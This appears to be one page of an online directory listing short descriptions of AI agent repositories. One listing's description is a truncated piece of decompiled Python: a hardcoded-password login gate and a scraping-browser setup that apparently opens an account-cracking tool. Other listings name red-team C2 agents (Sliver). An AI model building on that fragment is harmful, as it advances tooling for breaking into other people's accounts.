Framework
Custom agents
38,406 Custom AI agents indexed on MeshKore — the most complete public catalog, ranked by popularity and updated daily.
38,406 agents · ranked by popularity · refine in the directory →
Custom agents — page 134 of 385
Amazon Bedrock AgentCore – Multi Framework Examples
Plura is a powerful tool for creating, managing, and deploying AI agents. Built with TypeScript, it helps you develop intelligent agents that integrate with mini services, interact across platforms, maintain consistent personalities and knowledge, and automate tasks seamlessly.
Python framework for building scalable multi-agent systems with built-in orchestration, LLM integration, and intelligent task processing. Features dynamic scaling, fault tolerance, and advanced load balancing.
網頁聊天機器人 | tensorflow implementation of seq2seq model with bahdanau attention and Word2Vec pretrained embedding
NLP Cloud serves high performance pre-trained or custom models for NER, sentiment-analysis, classification, summarization, paraphrasing, intent classification, product description and ad generation, chatbot, grammar and spelling correction, keywords and keyphrases extraction, text generation, image generation, code generation, and much more...
Training & Implementation of chatbots leveraging GPT-like architecture with the aitextgen package to enable dynamic conversations.
整理:基于Rasa-NLU和Rasa-Core的任务型ChatBot
ChatBard: An Intelligent Customer Service Center App Using PaLM2 APIs
A Node.js SDK for using the Messenger Platform
Conditional Sequence Generative Adversarial Network trained with policy gradient, Implementation in Tensorflow
AME IS DISCONTINUED, SEE: https://github.com/mochiagents/mochi
A sentence splitting (sentence boundary disambiguation) library for Go. It is rule-based and works out-of-the-box.
Build a RAG dataset for your domain in just a few lines of codes, using your XML sitemap
A tutorial showing how to train RL agents for webgames, in this case, Chrome Dino
An AI-Powered documentation generator for legacy codebases
Build custom WhatsApp AI agents with Claude Code in under 30 minutes, no coding needed.
Sample scripts to use with Agentic Document Extraction (ADE).
This is a reference agent blueprint for AI-powered quantum device calibration. It provides an intelligent agent interface for discovering, executing, and analyzing quantum calibration experiments with support for automated workflows and vision-based analysis.
We track and analyze the activity and performance of autonomous code agents in the wild
来自顶尖研究机构的 AI 论文写作 Prompt 模板库与 Agent Skills 集合 ✨
Web2 bug bounty Agent Skill — evidence-based, no AI slop. Covers 18 vulnerability classes across HackerOne, Bugcrowd, Intigriti, and YesWeHack.
An agentic AI assistant built with Rust 🦀 , inspired by OpenClaw, NanoClaw, NullClaw, ZeroClaw, and MicroClaw and incorporating some of their design ideas. Contributions welcome!
Psychology-grounded selective memory system for AI agents (Claude Code, OpenCode) with STM/LTM consolidation, decay curves, and learned importance weights
DeerFlow 2.0 Windows Native - 字节跳动 AI Agent 系统的 Windows 10/11 原生适配版,无需 Docker/nginx
This repository stores personal AI Agent skills in a scalable directory layout.
UAV Flocking with Multi-Agent Reinforcement Learning. The Code of the paper: "An invulnerable leader–follower collision-free unmanned aerial vehicle flocking system with attention-based Multi-Agent Reinforcement Learning", which implemented fixed-wing UAV/Drone flocking with collision-free.
LivePerson Agent Messaging SDK for NodeJS
All of the directions for building a puppet agent package.
Agentic bot and coding
Hive Agents gateway localfirts
User Agent Parser for Rust
Single binary agent for Linux
Curated resources related Strands Agents.
Lane Changer Agent DQN
A Kubernetes operator to install and manage the Instana agent.
Sliver agent rewritten in C++
Train reinforcement learning agent using ML-Agents with Google Colab.
Hermes Agent Home Assistant Add-on
Local STT/TTS plugins for LiveKit Agents - no cloud APIs required
A PAM module that authenticates using the ssh-agent
An End-to-End CFD Agent with Domain-Specific Structured Thinking
A Node.js OAuth Agent, providing API driven OAuth and OpenID Connect for SPAs
double (dostoevsky reference) local memory system for agents
Real-time monitoring and visualization for OpenCode agents.
This repository contains the SDK that DLP agents may use to become service providers for the Google Chrome Content Analysis Connector.
Soulscript is a framework-agnostic standard for defining rich agent personalities that evolve over time.
Build safe on-brand voice and chat agents with structured flows, guardrails, and compliance
A sample yaml configuration for creating a headless pipeline to build Unity3D projects for HoloLens2 with Azure Pipelines and Microsoft Hosted Agents.
This Reinforcement learning agent uses Policy-Gradient method to trade the market
I/O Mapper Agent
Open source CLI agent that generates complete lesson bundles in your teaching voice. 48+ tools, zero-touch 9-file output, local-first privacy.
The Parallel Coordinator. Breaks down epic-level projects into parallel sub-tasks and dispatches them to multiple agents.
思維獵犬模式 (Thinking Hound Mode) - 一套具備工程紀律與對抗式思考的 Agent 指令系統
[ICRA2025] Integrates the vision, touch, and common-sense information of foundational models, customized to the agent's perceptual needs.
Code for paper "Process-Level Trajectory Evaluation for Environment Configuration in Software Engineering Agents"
One Skill for all repos. Give your agent access to the source code and docs of all open-source libraries
TADtool is an interactive tool for the identification of meaningful parameters in TAD-calling algorithms for Hi-C data.
Calling GO functions from PHP via FFI.
Local-first CLI + MCP server: Any file → AI-ready Markdown + JSON
Production-grade AI evaluation, prompt management & observability SDK. Automated evaluations with sub-100ms guardrails. No human-in-the-loop required. Python + TypeScript.
Multi-agent systems Development Kit - version 6
Telegram bot. It's an API to your Telegram, disposable emails, browser extension.
htop for AI coding agents — monitor token usage, costs, and workflows across Claude Code, Cursor, Kiro, Codex, and Copilot
从零构建 AI Agent:LLM 大模型应用开发实践
Nanomachine is a Virtual Machine (VM) AI agent dashboard that enables intelligent operative system automation and control. It provides a modern, intuitive interface for interacting with AI agents that can navigate and perform tasks in web browsers, filesystems, and more.
This is the repo for the paper Multi-Agent Collaborative Data Selection for Efficient LLM Pretraining.
Official implementation of the Neurocomputing paper "Multi-Vehicle Trajectory Prediction and Control at Intersections using State and Intention Information"
The Starcraft Multi-Agent challenge lite
#decompiled by PDM31 import os, sys print '\x1b[1;32mSudah punya ID dan Password nya?' print '\x1b[1;32mSilahkan Login ' import os, sys def wa(): os.system('xdg-open https://api.whatsapp.com/send?phone=6281291977644&text=Assalamualaikum') def restart(): ngulang = sys.executable os.execl(ngulang, ngulang, *sys.argv) user = raw_input('ID: ') import getpass sandi = raw_input('Password: ') if sandi == 'indoxploit' and user == 'Borot': print 'Anda Telah Login' sys.exit else: print 'Login GAGAL, Silahkan hubungi ADMIN' wa() restart() import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib from multiprocessing.pool import ThreadPool try: import mechanize except ImportError: os.system('pip2 install mechanize') else: try: import requests except ImportError: os.system('pip2 install requests') from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Keluar' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.1) logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x
Private Datasource Connect Agent
Glassmorphic agent management dashboard for OpenClaw
Sliver agents for Mythic
Code Hacker - VS Code Custom Agent + Web + TUI
Tablestore for Agent Memory
🤖 Home Assistant custom integration for using webhook-based systems (e.g. n8n) as conversation agents and voice assistants.
Agent-to-Sim Learning Interactive Behavior from Casual Videos.
Robotics-Deep Reinforcement Learning Project: Deep RL Arm Manipulation by using DQN (Deep Q-Learning Network) agent simulated on ROS-Gazebo with C++ API.
Offline and security-first tool for syncing and managing agent skills
A Claude Code plugin for orchestrating complex tasks by delegating to multiple parallel Codex agents, then merging and reviewing results.
A telegram AI Agent for managing Google calendar.
Real-time Slack ingest and MCP server to power your agentic Slack bots
Improve safety, security, and privacy of AI systems at build, deploy and run stages.
Meet your AI sidekick — a second brain that brings agents, tools, skills, autocompletion, and smart workflows directly into your notes
The repository for the scripts and materials for the paper "Simulating Opinion Dynamics with Networks of LLM-based Agents"."
An agent that stores and provides cryptographic keys to Bitwarden clients.
基于 Go 的加密货币量化交易 Agent(模仿 nof1 策略,偏长期交易)|Go-based cryptocurrency quantitative trading agent (imitating the nof1 strategy, leaning towards long-term trading)
A Reinforcement Learning agent for Clash Royale created using Proximal Policy Optimization
[ACL 2026] Code, benchmark and environment for "OS-Sentinel: Towards Safety-Enhanced Mobile GUI Agents via Hybrid Validation in Realistic Workflows"
A curated list of open-source projects at the intersection of Agent and RL
Agentless Lite: RAG-based SWE-Bench software engineering scaffold
AI Agent Marketplace | AI Agent Directory | AI Agent Index Repo for Public Available AI Agents Community
📝 md2wechat MCP Server | 让 Claude Code & AI Agent 一键排版发布到微信公众号
A post-retrieval temporal layer for RAG systems — validity filtering, time decay, document kind classification, and hybrid reranking in one pipeline.
A remote, phone-first console for your tmux — agent-agnostic, no database. Spawn and watch coding agents in parallel worktrees, or anything else you run.
Exercises and resources for the AI Coding Summit 2026 workshop: Advanced Claude Code Techniques for 2026. A hands-on two-hour workshop on the PIV Loop (Plan, Implement, Validate) for agentic coding.
The Open Source Voice Agent Platform. Orchestrate ultra-low latency AI pipelines for real-time conversations over WebRTC.